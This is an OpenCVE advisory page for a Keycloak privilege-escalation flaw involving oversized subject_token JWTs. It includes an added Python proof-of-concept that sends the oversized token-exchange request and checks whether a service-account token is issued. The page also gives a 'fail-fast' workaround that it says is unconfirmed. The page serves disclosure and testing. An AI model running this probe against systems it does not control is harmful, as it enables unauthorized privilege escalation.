Description
A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.
Published: 2026-05-27
Score: 6.8 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

An authenticated user with low privileges sends an oversized subject_token JSON Web Token to the Keycloak TokenEndpoint. If the JWT exceeds 4000 characters, the server silently drops the parameter and falls back to the client credentials, so the token it issues carries the permissions of the client's service account rather than those of the calling user. The result is privilege escalation from the user's own access level to that of the service account.

Affected Systems

Red Hat's Build of Keycloak is affected. The CVE record gives no version range (the CPE is cpe:/a:redhat:build_keycloak: with no version component), so every deployed instance of this distribution should be treated as affected until the vendor fix is applied.

Risk and Exploitability

The vulnerability carries a CVSS 3.1 base score of 6.8 (vector AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N): reachable over the network, high attack complexity, low privileges required, no user interaction, and high confidentiality and integrity impact with no availability impact. It is not listed in the CISA KEV catalog, and the EPSS estimate is below 1%. Exploitation requires an authenticated session, so an attacker must first obtain valid user credentials. Once authenticated, the attacker sends a crafted, oversized JWT as subject_token to the TokenEndpoint and, because the parameter is silently discarded, receives a token carrying the client's service-account privileges, bypassing the access controls that apply to the user's own token.

Generated by OpenCVE AI on May 27, 2026 at 20:31 UTC.
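A lab check for the behaviour described above, as an added example (not code from the OpenCVE page, Red Hat or the Keycloak project): it builds an RFC 8693 token-exchange request whose subject_token is padded past the 4000-character threshold named in the description, sends it to the realm's token endpoint, and reports whether the token that comes back belongs to the client's service account rather than to the presented subject. The token URL, realm, client id and secret are placeholders; the request assumes a confidential client authenticated with client_id/client_secret; the JWTs used offline are constructed with a dummy signature; the `service-account-` username prefix is Keycloak's naming convention for service-account users. Run it only against an instance you own.

```python
"""Probe for the oversized subject_token fall-back (added example, not vendor code)."""
import base64
import json
import urllib.error
import urllib.parse
import urllib.request

TOKEN_EXCHANGE_GRANT = "urn:ietf:params:oauth:grant-type:token-exchange"
SIZE_THRESHOLD = 4000  # character limit named in the CVE description


def b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def constructed_jwt(claims: dict) -> str:
    """Constructed JWT with a dummy signature, for offline tests only."""
    header = b64url(b'{"alg":"RS256","typ":"JWT"}')
    return ".".join((header, b64url(json.dumps(claims).encode()), b64url(b"dummy-sig")))


def decode_jwt_payload(token: str) -> dict:
    """Decode (not verify) the payload of a compact JWS so 'sub' and
    'preferred_username' of a freshly issued token can be inspected."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS")
    payload = parts[1] + "=" * (-len(parts[1]) % 4)
    return json.loads(base64.urlsafe_b64decode(payload))


def oversize_subject_token(subject_token: str, pad_claim: str = "pad") -> str:
    """Return a copy of subject_token padded past SIZE_THRESHOLD characters.
    The signature no longer matches, which does not matter here: the point of
    the CVE is that an oversized parameter never reaches the token validator."""
    header, _payload, sig = subject_token.split(".")
    claims = decode_jwt_payload(subject_token)
    needed = max(0, SIZE_THRESHOLD + 1 - len(subject_token))
    claims[pad_claim] = "A" * needed  # base64url expands this further, so it overshoots
    padded = b64url(json.dumps(claims, separators=(",", ":")).encode())
    return ".".join((header, padded, sig))


def build_exchange_form(client_id: str, client_secret: str, subject_token: str) -> dict:
    """Form body for POST /realms/<realm>/protocol/openid-connect/token (placeholder realm)."""
    return {
        "grant_type": TOKEN_EXCHANGE_GRANT,
        "client_id": client_id,
        "client_secret": client_secret,
        "subject_token": subject_token,
        "subject_token_type": "urn:ietf:params:oauth:token-type:access_token",
    }


def classify_result(subject_token: str, issued_token: str) -> str:
    """'subject' if the issued token kept the presented subject, 'service-account'
    if it is for the client's service account (Keycloak names these
    service-account-<client_id>), 'other' for anything else."""
    presented = decode_jwt_payload(subject_token)
    issued = decode_jwt_payload(issued_token)
    if issued.get("sub") == presented.get("sub"):
        return "subject"
    if str(issued.get("preferred_username", "")).startswith("service-account-"):
        return "service-account"
    return "other"


def probe(token_url: str, client_id: str, client_secret: str, subject_token: str) -> str:
    """Send the oversized exchange to a lab instance and classify the answer.
    A fixed server should answer with an HTTP error ('rejected') instead of issuing a token."""
    form = build_exchange_form(client_id, client_secret, oversize_subject_token(subject_token))
    body = urllib.parse.urlencode(form).encode()
    req = urllib.request.Request(token_url, data=body, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            issued = json.loads(resp.read())["access_token"]
    except urllib.error.HTTPError:
        return "rejected"
    return classify_result(form["subject_token"], issued)


if __name__ == "__main__":
    # Placeholders: realm, client and the user's own token must come from your lab.
    user_token = constructed_jwt({"sub": "1234", "preferred_username": "alice"})
    print(probe("https://keycloak.example.test/realms/demo/protocol/openid-connect/token",
                "demo-client", "demo-secret", user_token))
```

A result of `service-account` means the server issued a token for the client's service account in response to a request that named a different subject, which is the fall-back the CVE describes; `rejected` is the expected answer from a patched instance.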

Remediation

Vendor Workaround

To prevent the silent dropping of oversized `subject_token` JWTs, configure Keycloak to enforce strict parameter validation. This involves setting the `fail-fast` parameter to `true` for the `TokenEndpoint` configuration, so that requests with oversized parameters are rejected with an explicit error rather than processed with the parameter missing and the client credentials substituted. Confirm against the Keycloak documentation for the deployed version that this setting exists and behaves as described before relying on it; the vendor update remains the primary fix. A restart of the Keycloak service may be necessary for the change to apply.


OpenCVE Recommended Actions

  • Deploy the latest Keycloak update from Red Hat that resolves the oversized JWT handling.
  • If the patch cannot be applied immediately, configure TokenEndpoint "fail-fast" to true so that oversized tokens are rejected instead of silently dropped, after confirming the setting for your version.
  • Until patched, review the service-account roles granted to clients that accept token exchange and remove any the client does not need; the escalation yields exactly those roles, so least privilege on the service account bounds the impact.
  • Restart the Keycloak service after applying the configuration change.

Generated by OpenCVE AI on May 27, 2026 at 20:31 UTC.

Advisories

No advisories yet.

History

Thu, 28 May 2026 01:45:00 +0000

Type                | Values Removed | Values Added
First Time appeared | -              | Redhat build Of Keycloak
Vendors & Products  | -              | Redhat build Of Keycloak

Thu, 28 May 2026 00:15:00 +0000

Type                | Values Removed         | Values Added
References          | -                      | -
Metrics             | threat_severity: None  | threat_severity: Moderate

Wed, 27 May 2026 17:30:00 +0000

Type                | Values Removed | Values Added
Metrics             | -              | ssvc: {'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 27 May 2026 14:15:00 +0000

Type                | Values Removed | Values Added
Description         | -              | A flaw was found in Keycloak. An authenticated user with low privileges can exploit this vulnerability by sending an oversized subject_token JSON Web Token (JWT) to the TokenEndpoint. When the token exceeds a 4000-character limit, it is silently dropped, causing the system to fall back to client credentials. This allows the user to gain the permissions of the client's service account, leading to privilege escalation.
Title               | -              | Keycloak: keycloak: privilege escalation due to oversized subject_token jwt
First Time appeared | -              | Redhat; Redhat build Keycloak
Weaknesses          | -              | CWE-1284
CPEs                | -              | cpe:/a:redhat:build_keycloak:
Vendors & Products  | -              | Redhat; Redhat build Keycloak
References          | -              | -
Metrics             | -              | cvssV3_1: {'score': 6.8, 'vector': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N'}


MITRE

Status: PUBLISHED

Assigner: redhat

Published:

Updated: 2026-05-27T15:29:26.036Z

Reserved: 2026-05-27T12:39:12.284Z

Link: CVE-2026-9704

Vulnrichment

Updated: 2026-05-27T15:29:23.173Z

NVD

Status : Awaiting Analysis

Published: 2026-05-27T14:17:40.480

Modified: 2026-05-27T14:54:20.160

Link: CVE-2026-9704

Redhat

Severity : Moderate

Public Date: 2026-05-27T12:45:59Z

Links: CVE-2026-9704 - Bugzilla

OpenCVE Enrichment

Updated: 2026-05-28T01:30:03Z

Weaknesses